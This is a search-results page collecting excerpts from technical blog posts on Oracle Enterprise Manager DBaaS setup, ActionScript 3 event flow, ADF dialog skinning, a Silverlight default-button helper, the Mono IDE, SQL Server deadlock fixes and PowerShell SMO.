Search Results

Search found 3181 results on 128 pages for 'listener scan'.


  • Database-as-a-Service on Exadata Cloud

    - by Gagan Chawla
    Note – Oracle Enterprise Manager 12c DBaaS is platform agnostic and is designed to work on Exadata/non-Exadata, physical/virtual, and Oracle/non-Oracle platforms; Exadata is not a mandatory requirement as the base platform.
    Database-as-a-Service (DBaaS) is an important trend these days, and the top business drivers motivating customers towards a private database cloud model include constant pressure to reduce IT cost and complexity, along with the need to improve agility and quality of service. The first step many enterprises take in their journey towards cloud computing is to move to a consolidated and standardized environment. Exadata is already a proven, best-in-class consolidation platform, and we now see more and more customers evolving from an Exadata-based platform into an agile, self-service-driven private database cloud using Oracle Enterprise Manager 12c. Together, Exadata Database Machine and Enterprise Manager 12c provide the industry's most comprehensive and integrated solution to transform a typical siloed environment into an enterprise-class database cloud with self service, rapid elasticity, and pay-per-use capabilities.
    In today's post, I'll list the important steps to enable DBaaS on Exadata using Enterprise Manager 12c. These steps are drawn from a recent DBaaS implementation in a real customer engagement:
    1. Project planning – Define the scope of the implementation, map functional requirements and objectives to use cases, define high availability, network, and security requirements, and deliver the project plan. In a cloud project you plan around technology, business, and processes together, so engage your actual end users and stakeholders early, right from the scoping and planning stage.
    2. Set up your EM 12c Cloud Control site – Once the project plan is approved and signed off by the stakeholders, refer to the EM 12c Install guide. Some important tips for the site setup phase:
       - Review the new EM 12c Sizing paper before you get started with the install.
       - Select the Cloud, Chargeback and Trending, and Exadata plug-ins for deployment during the install.
       - Refer to the EM 12c Administrator's guide for high availability, security, and network/firewall best practices and options.
       - Do not combine your management and managed infrastructure, i.e. the EM 12c repository should not be hosted on the same Exadata where the target database cloud is to be set up.
    3. Set up roles and users – Cloud Administrator (EM_CLOUD_ADMINISTRATOR), Self Service Administrator (EM_SSA_ADMINISTRATOR), and Self Service User (EM_SSA_USER) are the important roles required for cloud lifecycle management. Roles and users are managed by the Super Administrator via the Setup menu -> Security option. For self-service (SSA) users, create custom role(s) based on EM_SSA_USER, and revoke the EM_USER and PUBLIC roles during SSA user account creation (a scripted sketch of this step appears at the end of this post).
    4. Configure the Software Library – The Cloud Administrator logs in and configures the software library via the Enterprise menu -> Provisioning and Patching option; the storage location is an OMS shared filesystem. The Software Library is the centralized repository that stores all software entities and is often termed the 'local store'.
    5. Set up Self Update – Self Update is one of the most innovative new features in the EM 12c framework. It is accessed by the Super Administrator via Setup -> Extensibility and is the unified delivery mechanism for all new and updated entities (agent software, plug-ins, connectors, gold images, provisioning bundles, etc.) in EM 12c.
    6. Deploy agents on all compute nodes and discover Exadata targets – Refer to the Exadata discovery cookbook for a detailed walkthrough that ensures successful discovery of the Exadata targets.
    7. Configure privilege delegation settings – The Super Administrator deploys the privilege setting template on all the nodes via the Setup menu -> Security option, choosing whether to use sudo or PowerBroker for all provisioning and patching operations.
    8. Provision Grid Infrastructure with RAC Database on the compute nodes – Software is provisioned in this step via a provisioning profile using EM 12c database provisioning. On Exadata, the Grid Infrastructure and RAC Database software is already deployed on the compute nodes via OneCommand from Oracle, so the SSA Administrator just needs to discover the Oracle Homes and Listener as EM targets. Databases will be created as and when users request them from the cloud.
    9. Customize the Create Database deployment procedure – The actual database creation steps are "templatized" by the Self Service Administrator, and the newly saved deployment procedure is used during service template creation in the next step. This is an important step; make sure you have locked all the required variables marked as locked 'Y' in this table.
    10. Set up the Self Service Portal – Set up zones, user quotas, service templates, and the chargeback plan. The SSA portal is set up by the Self Service Administrator via the Setup menu -> Cloud -> Database option, following the guided workflow. Refer to the DBaaS cookbook for details. You also have the option to customize the SSA login page via the steps documented in the EM 12c Cloud Administrator's guide.
    11. Final checks – Define and document process guidelines for SSA users and administrators. Get your SSA users trained on the Self Service Portal features and the overall DBaaS model; SSA administrators should be familiar with the Self Service Portal setup, the EM 12c database lifecycle management capabilities, and the overall EM 12c monitoring framework.
    12. GO LIVE – Announce the rollout of Database-as-a-Service to your SSA users. Users can log in to the Self Service Portal and request/monitor/view their databases in the Exadata-based database cloud. Congratulations! You just delivered a successful database cloud implementation project!
    In future posts, we will cover these additional useful topics around the database cloud:
    - DBaaS implementation tips and tricks – from setup to self service to managing the cloud lifecycle
    - 'How to' enable copies of real production databases in DBaaS with rapid provisioning in the database cloud
    - A case study of a customer who recently achieved success in their transformational journey from a traditional siloed environment to an Exadata-based database cloud using Enterprise Manager 12c
    More information:
    - Podcast on Database as a Service using Oracle Enterprise Manager 12c
    - Oracle Enterprise Manager 12c Installation and Administration guide, Cloud Administration guide
    - DBaaS Cookbook
    - Exadata Discovery Cookbook
    - Screenwatch: Private Database Cloud: Set Up the Cloud Self-Service Portal
    - Screenwatch: Private Database Cloud: Use the Cloud Self-Service Portal
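    As promised in step 3, the role and user setup can also be scripted with the EM command line interface (EM CLI) rather than the Setup menu. This is a minimal sketch with invented role and user names; the exact verb options, and whether the default EM_USER and PUBLIC grants must be revoked separately (e.g. with modify_user), should be checked against your EM CLI release:

        # Log in to EM CLI (assumes emcli is already installed and configured)
        emcli login -username=SYSMAN

        # Create a custom SSA role based on EM_SSA_USER (name is an example)
        emcli create_role -name="ACME_SSA_USER" -roles="EM_SSA_USER"

        # Create a self-service user granted the custom role; depending on
        # the release, EM_USER and PUBLIC may still need revoking afterwards
        emcli create_user -name="SSA_USER1" -password="Welcome123" -roles="ACME_SSA_USER"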

    Read the article

  • Using Event Driven Programming in games, when is it beneficial?

    - by Arthur Wulf White
    I am learning ActionScript 3 and I see the event flow adheres to the W3C recommendations. From what I have learned, events can only be captured by the dispatcher unless the listener capturing the event is a DisplayObject on stage and a parent of the object firing the event. You can capture events in the capture (before) or bubbling (after) phase depending on the listener and event setup you use. Does this system lend itself well to game programming? When is this system useful? Could you give an example of a case where using events is a lot better than going without them? Are they somehow better for performance in games?
    Please do not mention events you must use to get a game running, like Event.ENTER_FRAME, or events that are required to get input from the user, like KeyboardEvent.KEY_DOWN and MouseEvent.CLICK. I am asking if there is any use in firing events that have nothing to do with user input, frame rendering and the like (that are necessary). I am referring to cases where objects are communicating. Is this used to avoid storing a collection of objects that are on the stage? Thanks.
    Here is some code I wrote as an example of event behavior in ActionScript 3, enjoy.

        package regression
        {
            import flash.display.Shape;
            import flash.display.Sprite;
            import flash.events.Event;
            import flash.events.EventDispatcher;
            import flash.events.KeyboardEvent;
            import flash.events.MouseEvent;
            import flash.events.EventPhase;

            /**
             * ...
             * @author ...
             */
            public class Check_event_listening_1 extends Sprite
            {
                public const EVENT_DANCE : String = "dance";
                public const EVENT_PLAY : String = "play";
                public const EVENT_YELL : String = "yell";
                private var baby : Shape = new Shape();
                private var mom : Sprite = new Sprite();
                private var stranger : EventDispatcher = new EventDispatcher();

                public function Check_event_listening_1()
                {
                    if (stage) init();
                    else addEventListener(Event.ADDED_TO_STAGE, init);
                }

                private function init(e:Event = null):void
                {
                    trace("test begun");
                    addChild(mom);
                    mom.addChild(baby);

                    stage.addEventListener(EVENT_YELL, onEvent);
                    this.addEventListener(EVENT_YELL, onEvent);
                    mom.addEventListener(EVENT_YELL, onEvent);
                    baby.addEventListener(EVENT_YELL, onEvent);
                    stranger.addEventListener(EVENT_YELL, onEvent);

                    trace("\nTest1 - Stranger yells with no bubbling");
                    stranger.dispatchEvent(new Event(EVENT_YELL, false));
                    trace("\nTest2 - Stranger yells with bubbling");
                    stranger.dispatchEvent(new Event(EVENT_YELL, true));

                    stage.addEventListener(EVENT_PLAY, onEvent);
                    this.addEventListener(EVENT_PLAY, onEvent);
                    mom.addEventListener(EVENT_PLAY, onEvent);
                    baby.addEventListener(EVENT_PLAY, onEvent);
                    stranger.addEventListener(EVENT_PLAY, onEvent);

                    trace("\nTest3 - baby plays with no bubbling");
                    baby.dispatchEvent(new Event(EVENT_PLAY, false));
                    trace("\nTest4 - baby plays with bubbling");
                    baby.dispatchEvent(new Event(EVENT_PLAY, true));
                    trace("\nTest5 - baby plays with bubbling but is not a child of mom");
                    mom.removeChild(baby);
                    baby.dispatchEvent(new Event(EVENT_PLAY, true));
                    mom.addChild(baby);

                    stage.addEventListener(EVENT_DANCE, onEvent, true);
                    this.addEventListener(EVENT_DANCE, onEvent, true);
                    mom.addEventListener(EVENT_DANCE, onEvent, true);
                    baby.addEventListener(EVENT_DANCE, onEvent);

                    trace("\nTest6 - Mom dances without bubbling - everyone is listening during capture phase(not target and bubble phase)");
                    mom.dispatchEvent(new Event(EVENT_DANCE, false));
                    trace("\nTest7 - Mom dances with bubbling - everyone is listening during capture phase(not target and bubble phase)");
                    mom.dispatchEvent(new Event(EVENT_DANCE, true));
                }
                private function onEvent(e : Event):void
                {
                    trace("Event was captured");
                    trace("\nTYPE : ", e.type, "\nTARGET : ", objToName(e.target),
                          "\nCURRENT TARGET : ", objToName(e.currentTarget),
                          "\nPHASE : ", phaseToString(e.eventPhase));
                }

                private function phaseToString(phase : int):String
                {
                    switch(phase)
                    {
                        case EventPhase.AT_TARGET :
                            return "TARGET";
                        case EventPhase.BUBBLING_PHASE :
                            return "BUBBLING";
                        case EventPhase.CAPTURING_PHASE :
                            return "CAPTURE";
                        default:
                            return "UNKNOWN";
                    }
                }

                private function objToName(obj : Object):String
                {
                    if (obj == stage) return "STAGE";
                    else if (obj == this) return "MAIN";
                    else if (obj == mom) return "Mom";
                    else if (obj == baby) return "Baby";
                    else if (obj == stranger) return "Stranger";
                    else return "Unknown";
                }
            }
        }

        /* result :
        test begun

        Test1 - Stranger yells with no bubbling
        Event was captured
        TYPE : yell
        TARGET : Stranger
        CURRENT TARGET : Stranger
        PHASE : TARGET

        Test2 - Stranger yells with bubbling
        Event was captured
        TYPE : yell
        TARGET : Stranger
        CURRENT TARGET : Stranger
        PHASE : TARGET

        Test3 - baby plays with no bubbling
        Event was captured
        TYPE : play
        TARGET : Baby
        CURRENT TARGET : Baby
        PHASE : TARGET

        Test4 - baby plays with bubbling
        Event was captured
        TYPE : play
        TARGET : Baby
        CURRENT TARGET : Baby
        PHASE : TARGET
        Event was captured
        TYPE : play
        TARGET : Baby
        CURRENT TARGET : Mom
        PHASE : BUBBLING
        Event was captured
        TYPE : play
        TARGET : Baby
        CURRENT TARGET : MAIN
        PHASE : BUBBLING
        Event was captured
        TYPE : play
        TARGET : Baby
        CURRENT TARGET : STAGE
        PHASE : BUBBLING

        Test5 - baby plays with bubbling but is not a child of mom
        Event was captured
        TYPE : play
        TARGET : Baby
        CURRENT TARGET : Baby
        PHASE : TARGET

        Test6 - Mom dances without bubbling - everyone is listening during capture phase(not target and bubble phase)
        Event was captured
        TYPE : dance
        TARGET : Mom
        CURRENT TARGET : STAGE
        PHASE : CAPTURE
        Event was captured
        TYPE : dance
        TARGET : Mom
        CURRENT TARGET : MAIN
        PHASE : CAPTURE

        Test7 - Mom dances with bubbling - everyone is listening during capture phase(not target and bubble phase)
        Event was captured
        TYPE : dance
        TARGET : Mom
        CURRENT TARGET : STAGE
        PHASE : CAPTURE
        Event was captured
        TYPE : dance
        TARGET : Mom
        CURRENT TARGET : MAIN
        PHASE : CAPTURE
        */
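    On the "objects communicating" case the question asks about, here is a minimal, hypothetical sketch (my own illustration, not from any framework) of a gameplay event that has nothing to do with input or rendering: an enemy announces its own death, and any interested system listens without holding a reference to the enemy.

        package
        {
            import flash.events.Event;

            // Hypothetical gameplay event - the class and type names are invented
            public class EnemyEvent extends Event
            {
                public static const DIED : String = "enemyDied";
                public var score : int;

                public function EnemyEvent(type : String, score : int)
                {
                    super(type, true); // bubbles, so a parent container can listen
                    this.score = score;
                }

                // Bubbling events should be cloneable when redispatched
                override public function clone():Event
                {
                    return new EnemyEvent(type, score);
                }
            }
        }

    An enemy on the display list would call dispatchEvent(new EnemyEvent(EnemyEvent.DIED, 100)), and a score keeper higher up the display list would addEventListener(EnemyEvent.DIED, ...) - neither object needs to know about the other, which is exactly the collection-free decoupling the question hints at.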

    Read the article

  • How-to hide the close icon for task flows opened in dialogs

    - by frank.nimphius
    ADF bounded task flows can be opened in an external dialog and return values to the calling application, as documented in chapter 19 of Oracle Fusion Middleware Fusion Developer's Guide for Oracle Application Development Framework 11g:
    http://download.oracle.com/docs/cd/E15523_01/web.1111/b31974/taskflows_dialogs.htm#BABBAFJB
    Setting the task flow call activity property Run as Dialog to true and the Display Type property to inline-popup opens the bounded task flow in an inline popup. To launch the dialog, a command item is used that references the control flow case to the task flow call activity:

        <af:commandButton text="Lookup" id="cb6"
                windowEmbedStyle="inlineDocument" useWindow="true"
                windowHeight="300" windowWidth="300"
                action="lookup" partialSubmit="true"/>

    By default, the dialog that contains the task flow has a close icon that, if pressed, closes the dialog and returns to the calling page. However, no event is sent to the calling page to handle the close case. To prevent users from closing the dialog without the calling application being notified in a return listener, the close icon shown in the opened dialog can be hidden using ADF Faces skinning. The following skin selector hides the close icon in the dialog:

        af|panelWindow::close-icon-style { display:none; }

    To learn about skinning, see chapter 20 of Oracle Fusion Middleware Web User Interface Developer's Guide for Oracle Application Development Framework:
    http://download.oracle.com/docs/cd/E15523_01/web.1111/b31973/af_skin.htm#BAJFEFCJ
    However, the skin selector shown above hides the close icon from all af:panelWindow usages, which may not be intended. To hide the close icon only in dialogs opened by a bounded task flow call activity, the ADF Faces component styleClass property can be used. The af:panelWindow component shown below has a "withCloseIcon" style class name defined. This name is referenced in the following skin selector, ensuring that the close icon is displayed:

        af|panelWindow.withCloseIcon::close-icon-style { display:block; }

    In summary, to hide the close icon shown for bounded task flows that are launched in inline popup dialogs, the default display behavior of the close icon of the af:panelWindow needs to be reversed. Instead of always displaying the close icon, the close icon is always hidden, using the first skin selector. To show the close icon in other usages of the af:panelWindow component, the component is flagged with a styleClass property value as shown below:

        <af:popup id="p1">
          <af:panelWindow id="pw1" contentWidth="300" contentHeight="300"
                          styleClass="withCloseIcon"/>
        </af:popup>

    The "withCloseIcon" value is referenced in the second skin definition. The complete entry of the skin CSS file looks as shown below:

        af|panelWindow::close-icon-style { display:none; }
        af|panelWindow.withCloseIcon::close-icon-style { display:block; }
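    For completeness, a custom skin containing these selectors must be registered before they take effect. The sketch below is a hedged example, not from the original post: the skin id, family, and file path are invented, and the exact <extends> value should be matched to your ADF Faces release. The skin is registered in WEB-INF/trinidad-skins.xml and activated in WEB-INF/trinidad-config.xml:

        <!-- WEB-INF/trinidad-skins.xml (names are examples) -->
        <skins xmlns="http://myfaces.apache.org/trinidad/skin">
          <skin>
            <id>mycompany.desktop</id>
            <family>mycompany</family>
            <render-kit-id>org.apache.myfaces.trinidad.desktop</render-kit-id>
            <extends>blafplus-rich.desktop</extends>
            <style-sheet-name>skins/mycompany/skin.css</style-sheet-name>
          </skin>
        </skins>

        <!-- WEB-INF/trinidad-config.xml -->
        <trinidad-config xmlns="http://myfaces.apache.org/trinidad/config">
          <skin-family>mycompany</skin-family>
        </trinidad-config>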

    Read the article

  • Building on someone else's DefaultButton Silverlight work...

    - by KyleBurns
    This week I was handed a "simple" requirement - have a search screen execute its search when the user presses the Enter key, instead of having to move hands from keyboard to mouse and click Search. That is a reasonable request that has been met for years in both Windows and web apps. I did a quick scan for code to pilfer and found Patrick Cauldwell's blog posting "A 'Default Button' In Silverlight". This posting was a great start and I'm glad that the basic work had been done for me, but I ran into one issue - when using bound textboxes (I'm a die-hard MVVM enthusiast when it comes to Silverlight development), the search was being executed before the textbox I was in when the Enter key was pressed had updated its bindings. With a little bit of reflection work, I think I have found a good generic solution that builds upon Patrick's to make it more binding-friendly. Also, I wanted to set the DefaultButton at a higher level than on each TextBox (or other control for that matter), so mine is intended to be set somewhere such as the LayoutRoot or another high-level control, and it applies to all controls beneath it in the control tree. I haven't tested this on controls that treat the Enter key as special themselves.
    The real change from Patrick's solution here is that in the KeyUp event, I grab the source of the KeyUp event (in my case the textbox containing search criteria) and loop through the static fields on the element's type looking for DependencyProperty instances. When I find a DependencyProperty, I grab the value and query for bindings. Each time I find a binding, UpdateSource is called to make sure anything bound to any property of the field has the opportunity to update before the action represented by the DefaultButton is executed.
    Here's the code:

        public class DefaultButtonService
        {
            public static DependencyProperty DefaultButtonProperty =
                DependencyProperty.RegisterAttached("DefaultButton", typeof(Button),
                    typeof(DefaultButtonService), new PropertyMetadata(null, DefaultButtonChanged));

            private static void DefaultButtonChanged(DependencyObject d, DependencyPropertyChangedEventArgs e)
            {
                var uiElement = d as UIElement;
                var button = e.NewValue as Button;
                if (uiElement != null && button != null)
                {
                    uiElement.KeyUp += (sender, arg) =>
                    {
                        if (arg.Key == Key.Enter)
                        {
                            var element = arg.OriginalSource as FrameworkElement;
                            if (element != null)
                            {
                                UpdateBindings(element);
                            }
                            if (button.IsEnabled)
                            {
                                button.Focus();
                                var peer = new ButtonAutomationPeer(button);
                                var invokeProv = peer.GetPattern(PatternInterface.Invoke) as IInvokeProvider;
                                if (invokeProv != null)
                                    invokeProv.Invoke();
                                arg.Handled = true;
                            }
                        }
                    };
                }
            }

            // The attached property is registered as typeof(Button), so the
            // accessors use Button as well
            public static Button GetDefaultButton(UIElement obj)
            {
                return (Button)obj.GetValue(DefaultButtonProperty);
            }

            public static void SetDefaultButton(DependencyObject obj, Button button)
            {
                obj.SetValue(DefaultButtonProperty, button);
            }

            public static void UpdateBindings(FrameworkElement element)
            {
                // Walk the public static fields of the element's type looking for
                // DependencyProperty instances, and push any pending binding
                // values back to their sources
                foreach (var field in element.GetType().GetFields(BindingFlags.Public | BindingFlags.Static))
                {
                    if (field.FieldType.IsAssignableFrom(typeof(DependencyProperty)))
                    {
                        try
                        {
                            var dp = field.GetValue(null) as DependencyProperty;
                            if (dp != null)
                            {
                                var binding = element.GetBindingExpression(dp);
                                if (binding != null)
                                {
                                    binding.UpdateSource();
                                }
                            }
                        }
                        // ReSharper disable EmptyGeneralCatchClause
                        catch (Exception)
                        // ReSharper restore EmptyGeneralCatchClause
                        {
                            // swallow exceptions
                        }
                    }
                }
            }
        }
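    As a usage sketch (the namespace mapping and element names below are my illustration, not from either post), the attached property is set once on a high-level container and pointed at the search button by element name:

        <!-- xmlns:local is assumed to map to the namespace holding DefaultButtonService -->
        <Grid x:Name="LayoutRoot"
              local:DefaultButtonService.DefaultButton="{Binding ElementName=SearchButton}">
            <StackPanel>
                <TextBox Text="{Binding SearchText, Mode=TwoWay}" />
                <Button x:Name="SearchButton" Content="Search" Command="{Binding SearchCommand}" />
            </StackPanel>
        </Grid>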

    Read the article

  • October in Review

    - by Richard Bingham
    With OpenWorld over, October was time to get back to serious work for everyone, including the Fusion Applications Developer Relations team. Don't forget the OpenWorld content is still available, including presentation downloads, for a limited period of time, so be sure to grab anything you found useful or take another scan for anything you might have missed. Of all the announcements, the continued evolution of the Oracle Cloud services for extending and integrating with Fusion Applications is increasing in popularity, and certainly the Cloud Marketplace is something we're becoming involved in. More details to follow.
    Fusion Concepts
    Last week Vik from our team started the new "Fusion Concepts" series of articles, providing those new to Fusion Applications an explanation of the architectural basics, with the aim of reducing the learning curve and laying the platform for more efficient and effective development. The series began with an insightful first post on the different schemas that exist in the Fusion Applications database. Look out for upcoming posts on multi-lingual entities, profile options, look-ups and more.
    New Learning Resources
    Our YouTube channel continued to expand with more 'how to' videos on using Page Composer, extending the Simplified UI (aka FUSE), and integrating BI reports and analytics. Also, the Oracle Learning Library is now well established as a central resource for knowledge, with thousands of tutorials, videos, and documents. Of particular note are the great new extensibility-related videos added by the CRM Product Management team, including more on the ever-expanding capabilities of Application Composer. To see some examples of these, search using the keyword 'customization' or the product 'Sales Cloud'. Finally on learning resources, as Oliver mentioned, the Oracle Press book on Fusion Application Customization and Extensibility is now available for pre-order on Amazon (due out 1st Jan).
    Out And About
    October also saw us attend the annual Apps Conference held by the UK Oracle User Group in London. Interestingly, there was an Applications Transformation stream of sessions and content that included Fusion Applications, with all the latest in the Oracle Applications evolution, as always focused around the three tenets of social, mobile, and cloud. Read more in Richard's post-event write-up.
    Other teams around Oracle have also been busy. Angelo from the Platform Technical Services group has done quite a bit of work using web services with Fusion SaaS and has published many interesting findings on his blog. It's definitely recommended reading if you are working on any related integration projects. The middleware-for-applications group has built a new tool called "AppAdvantage", offering an online assessment of your use of Fusion Middleware technologies with Oracle Applications. As the popularity of integrating cloud applications with on-premises systems continues to grow, leveraging existing middleware technologies (and licenses) to support the integration solution is likely to be of paramount importance. Similarly, the "Build Enterprise Application Extensions with Ease" section of the related webpage has AppsUX director Killian Evers speaking about customization using the composer tools. Both are useful resources for those just getting started with a move to Fusion Applications.
    The Oracle A-Team, specialists in middleware technical architecture, always publish superb content via their 'chronicles' site, now with a substantial amount specifically related to Fusion Applications. Click on the Fusion Applications menu at the top right of their homepage to see more. Of particular note last month was an article on customizing the timeout pop-up message shown to inactive users, providing design-time insight and easy-to-follow steps. Finally, if you're looking at using Oracle Middleware and Cloud to tailor and extend your applications, then you may also be interested in this new blog post on the roadmap for Oracle SOA and the latest on-demand Cloud Development webcast.

    Read the article

  • Stepping outside Visual Studio IDE [Part 2 of 2] with Mono 2.6.4

    - by mbcrump
    Continuing part 2 of my "Stepping outside the Visual Studio IDE" series is the open-source Mono Project. Mono is a software platform designed to allow developers to easily create cross-platform applications. Sponsored by Novell (http://www.novell.com/), Mono is an open source implementation of Microsoft's .NET Framework based on the ECMA standards for C# and the Common Language Runtime. A growing family of solutions and an active, enthusiastic contributing community are helping position Mono to become the leading choice for development of Linux applications.
    So, to clarify: you can use Mono to develop .NET applications that will run on Linux, Windows or Mac. It's basically an IDE that has its roots in Linux. Let's first look at compatibility.
    Compatibility
    If you already have an application written in .NET, you can scan it with the Mono Migration Analyzer (MoMA) to determine if it uses anything not supported by Mono. The current release version of Mono is 2.6 (released December 2009). The easiest way to describe what Mono currently supports is: everything in .NET 3.5 except WPF and WF, with limited WCF. Here is a slightly more detailed view, by .NET framework version:
    Implemented:
    - C# 3.0, System.Core, LINQ
    - ASP.Net 3.5, ASP.Net MVC
    - C# 2.0 (generics)
    - Core Libraries 2.0: mscorlib, System, System.Xml
    - ASP.Net 2.0 - except WebParts
    - ADO.Net 2.0
    - Winforms/System.Drawing 2.0 - does not support right-to-left
    - C# 1.0
    - Core Libraries 1.1: mscorlib, System, System.Xml
    - ASP.Net 1.1
    - ADO.Net 1.1
    - Winforms/System.Drawing 1.1
    Partially implemented:
    - LINQ to SQL - mostly done, but a few features missing
    - WCF - Silverlight 2.0 subset completed
    Not implemented:
    - WPF - no plans to implement
    - WF - will implement WF 4 instead in future versions of Mono
    - System.Management - does not map to Linux
    - System.EnterpriseServices - deprecated
    Links to documentation: The Official Mono FAQs. Links to binaries: Mono IDE, latest version 2.6.4. That's it - nothing more is required to compile and run .NET code on Linux.
    Installation
    After landing on the Mono project home page, you can select which platform you want to download. I typically pick the Virtual PC image since I spend all of my day using Windows 7. Go ahead and pick whatever version is best for you. The Virtual PC image comes with SUSE Linux. Once the image is launched, you will see the following: I'm not going to go through each option, but it's best to start with the "Start Here" icon. It will provide you with information on new projects or existing VS projects. After you get Mono installed, it's probably a good idea to run a quick Hello World program to make sure everything is set up properly. This lets you know that your Mono install is working before you try writing or running a more complex application. To write a "Hello World" program, follow these steps:
    1. Start the Mono Development Environment.
    2. Create a new project: File->New->Solution.
    3. Select "Console Project" in the category list.
    4. Enter a project name into the Project name field, for example "HW Project".
    5. Click "Forward".
    6. Click "Packaging", then OK.
    You should have a screen very similar to a VS console app. Click the "Run" button in the toolbar (Ctrl-F5), then look in the Application Output and you should see "Hello World!". Your screen should look like the screen below. That should do it for a simple console app in Mono.
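    For reference, the console project the wizard generates boils down to a few lines of standard C#; the namespace and class names below are just the typical template shape and will match whatever project name you chose:

        using System;

        namespace HWProject
        {
            class MainClass
            {
                public static void Main(string[] args)
                {
                    // Appears in the Application Output pad when run with Ctrl-F5
                    Console.WriteLine("Hello World!");
                }
            }
        }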
    To test out an ASP.NET application, simply copy your code to a new directory in /srv/www/htdocs, then visit the following URL: http://localhost/directoryname/page.aspx, where directoryname is the directory where you deployed your application and page.aspx is the initial page for your software.
    Databases
    You can continue to use a SQL Server database, or use MySQL, Postgres, Sybase, Oracle, IBM's DB2 or SQLite.
    Conclusion
    I hope this brief look at the Mono IDE helps someone get acquainted with development outside of VS. As always, I welcome any suggestions or comments.

    Read the article

  • Reducing Deadlocks - not a DBA issue ?

    - by steveh99999
    As a DBA, I'm involved on an almost daily basis in troubleshooting 'SQL Server' performance issues. Often, this troubleshooting soon veers away from 'it's a SQL Server issue' to become a wider application/database design/coding issue.
    One common perception with SQL Server is that deadlocking is an application design issue - and is fixed by recoding. I see this reinforced by MCP-type questions/scenarios where the answer to prevent deadlocking is simply to change the order in which tables are accessed in code. Whilst this is correct, I do think it has led to a situation where many 'operational' or 'production support' DBAs, when faced with a deadlock, are happy to throw the issue over to developers without analysing it further. A couple of 'war stories' on deadlocks which I think are interesting:
    Case one: I had an issue recently on a third-party application that I support on SQL 2008. This particular third-party application has an unusual support agreement where the customer is allowed to change the index design on the third-party provided database. However, we are not allowed to alter application code or modify table structure. This third-party application is also known to encounter occasional deadlocks - indeed, I have documentation from the vendor that up to 50 deadlocks per day is not unusual! So, as a DBA I have to support an application which in my opinion has too many deadlocks - but I cannot influence the design of the tables or stored procedures for the application. This should be the classic blame-the-third-party-developers scenario, where we hope the issue gets addressed in a future application release - i.e. we could wait years for this to be resolved and implemented in our production environment. But, as DBAs can change the index layout, was there anything I could still do to reduce the deadlocks in the application?
    I initially used SQL trace flag 1222 to write deadlock detection output to the SQL errorlog - using this, I was able to identify one table heavily involved in the deadlocks. When I examined the table definition, I was surprised to see it was a heap - i.e. no clustered index existed on the table. Using SQL Profiler to see the locking behaviour and the plan for the query involved in the deadlock, I was able to confirm a table scan was being performed. By creating an appropriate clustered index, it was possible to produce a more efficient plan and locking behaviour. So, fewer locks, held for less time = less possibility of deadlocks. I'm still unhappy about the overall number of deadlocks on this system - but that's something to be discussed further with the vendor.
    Case two: a system which hadn't changed for months suddenly started seeing deadlocks on a regular basis. I love the 'nothing's changed' scenario, as it gives me the opportunity to appear wise and say 'nothing's changed on this system, except the data'. This particular deadlock occurred on a table which had been growing rapidly. By using DBCC SHOW_STATISTICS, the DBA team were able to see that the deadlocks seemed to be occurring shortly after auto-update stats had regenerated the table statistics using its default sampling behaviour. As a quick fix, we were able to schedule a nightly UPDATE STATISTICS WITH FULLSCAN on the table involved in the deadlock - thus greatly reducing the potential for stats to be updated via auto_update_stats, and consequently reducing the potential for a bad plan to be generated based on an unrepresentative sample of the data. This reduced the possibility of a deadlock occurring. Not a perfect solution by any means, but quick, easy to implement, and needing no application code changes. This fix gave us some 'breathing space' to properly fix the code during the next scheduled application release.
    The moral of this post - don't dismiss deadlocks as issues that can only be fixed by developers...
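    For anyone who wants to try the same steps, the T-SQL involved is standard; the object names below are invented stand-ins for the real tables identified in the trace output:

        -- Case one: write deadlock graphs to the SQL Server errorlog
        DBCC TRACEON (1222, -1);

        -- ...the output pointed at a heap; giving it a clustered index lets the
        -- query seek rather than scan the whole table
        CREATE CLUSTERED INDEX CIX_OrderDetail_OrderId
            ON dbo.OrderDetail (OrderId);

        -- Case two: nightly job to rebuild statistics from a full scan,
        -- pre-empting auto-update stats and its default sampling
        UPDATE STATISTICS dbo.FastGrowingTable WITH FULLSCAN;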

    Read the article

  • Starting over and new to Ubuntu

    - by 2funnyyone
    We have been having repeated problems with our internet service and Windows XP & SP3 (users and permissions) - I see no need for them. I started with computers long before Windows. Ever since SP3 came out in 2009 I have had nothing but problems. I have lost so many computers to viruses and trojans, we just stack them up. We are with Qwest/CenturyLink, which is using advertising servers, which I think is causing the problem. All the computers are networked together, which is not how I set them up. I believe CenturyLink is networking them through assignment of a domain for our home. This causes all the computers to crash twice. This is getting expensive. We tried buying new hard drives, but they reinfect within hours of connecting to the internet. I also believe the modem, router and all computers are infected. I put ComboFix on this one, and that is the only reason we are still online with this laptop. I am afraid to install new equipment because my partner and I are on SSDI and this costs a lot. I go to school at UOP and have had to run off a flash drive and reboot this laptop to recovery every other day or so this past month.
    The new plan is: we are getting ready to install new equipment but are afraid to reinfect again. Need help to install the new equipment. The plan is to use the current internet service from Qwest/now CenturyLink. The list of new equipment, in order:
    - CenturyLink wireless modem: ZyXEL PK5000Z with 4 direct-connect Ethernet ports
    - Dell Optiplex 210L (used auction purchase), 2 GB RAM, 80 GB hard drive, Ubuntu 11.10 operating system
    - Wireless D-Link router WBR-1310 with 4 direct-connect Ethernet ports
    - Purchased Dell OEM disk for repairing or reinstalling the Windows XP Professional operating system (2 roommates as well)
    All infected computers are Dell desktops or laptops with XP Pro. Also purchasing Ubuntu 12.04 for 3 computers. We like the way it runs but are still learning it.
    Questions:
    1] How do we fdisk the infected computers without infecting the new system? We have DOS disks, but none of the machines have a floppy disk drive. We do have a new floppy disk drive and USB adapter we purchased from Amazon.
    2] We are thinking Avast internet security because of the boot scan. We want all software loaded before reconnecting; we can manually load our internet provider information. We purchased StopZilla ($100 for 5 computers), but are not sure that is what we need. We also need to know how to set up port security and the services we will need - really lost at this part - so we are safe when we go back on the internet.
    3] We want to connect the re-imaged systems to the router as a public connection with no sharing. We do not want to network all the computers.
    4] We want parental/ownership control from the Ubuntu system for the internet connection (children and friends). Do we restrict at the modem and/or the router?
    Any help would be a blessing. I do not want to go it alone anymore.

    Read the article

  • PowerShell and SMO – be careful how you iterate

    - by Fatherjack
    I've yet to have a totally smooth experience with PowerShell, and it was late on Friday when I crashed into this problem. I haven't investigated whether this is a generally well understood circumstance, and if it is then I apologise for repeating everything.
    Scenario: I wanted to scan a number of servers for many properties, including existing logins, and to identify which accounts are bestowed with sysadmin privileges. A great task to pass to PowerShell, so with a heavy heart I started up PowerShell ISE and started typing. The script doesn't come easily to me, but I follow the logic of SMO and the properties and methods available in the language, so it seemed something I should be able to master.
